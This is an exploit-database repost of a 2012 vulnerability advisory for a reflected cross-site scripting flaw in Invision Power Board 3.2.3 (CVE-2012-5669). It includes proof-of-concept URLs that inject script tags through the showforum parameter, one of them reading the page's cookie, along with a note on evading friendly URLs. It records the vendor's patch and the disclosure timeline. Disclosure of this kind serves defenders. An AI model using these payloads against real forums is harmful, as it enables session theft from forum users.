Advertisement






Invision Power Board 3.2.3 Cross Site Scripting

CVE Category Price Severity
CVE-2012-5669 CWE-79 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2012-03-20
CVSS EPSS EPSSP
CVSS:4.0/AV:A/AC:M/PR:L/UI:R/S:C/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2012030130

Below is a copy:

Name :  Cross-site scripting vulnerability in Invision Power Board version 3.2.3
Software :  Invision Power Board version 3.2.3
Vendor Homepage :  http://www.invisionpower.com
Vulnerability Type :  Cross-site scripting
Researcher :  Vasil A. [email protected]

Description
--------------------
Invision Power Board (abbreviated IPB, IP.Board or IP Board) is an
Internet forum software produced by Invision Power Services, Inc. It
is written in PHP and primarily uses MySQL as a database management
system, although support for other database engines is available.

Details
--------------------
IP Board is affected by a Cross-site scripting vulnerability in version 3.2.3.

Example PoC url is as follows :

http://example.com/forums/index.php?showforum=53"><script>with(document)alert(cookie)</script>

Additional notes:
1.If a forum contain sub-forums this vulnerability don't exist.

2.Most of boards uses "Friendly Url style",but the attack can be
performed  by using "legacy URL style" in the query,e.g :

http://example.com/forum/index.php?showforum=2"><script>alert(/xss/.source)</script>

instead:

http://example.com/forum/index.php?/forum/2-example/

Solution
--------------------
The vendor issued patch for this vulnerability. Please see the references.

Advisory Timeline
--------------------
10/03/2012 - First contact: Sent the vulnerability details
12/03/2012 - Second contact: Ask for patch
14/03/2012 - Vulnerability Fixed
15/03/2012 - Vulnerability Released

Credits
-------------------
It has been discovered on testing of Netsparker, Web Application
Security Scanner - http://www.mavitunasecurity.com/netsparker/.


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum